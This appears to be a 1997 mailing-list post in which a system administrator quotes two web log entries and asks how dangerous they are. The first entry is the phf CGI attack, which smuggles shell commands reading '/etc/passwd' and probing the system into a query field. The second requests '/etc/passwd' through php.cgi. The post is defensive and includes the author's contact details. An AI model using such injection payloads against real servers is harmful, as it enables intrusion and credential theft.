I have noticed on my WWW log files the following 2 entries.
some.remote.location.edu - - [28/Apr/1997:01:33:21 +0015] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Aypcat%20passwd%0Apwd%0Aid%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 140
some.remote.location.edu - - [28/Apr/1997:01:33:23 -74587788] "GET /cgi-bin/php.cgi?/etc/passwd" 404 143
Does anyone know anything about these cgi scripts or programs?
Or how dangerous this is?
I changed the real source location to a fake some.remote.location.edu to
not let out the bag of the source of this hack, since I am not sure what
my next move would be.
Thanks in advance.
Stan Wnuck swnuck @
10 Industrial Way East (908) 389-3295 x542
Eatontown, NJ 07724 (908) 389-5461 Fax
PM-CHS Technology Insertion Office
Ft. Monmouth Army Base, NJ (908) 427-2033 / 427-6963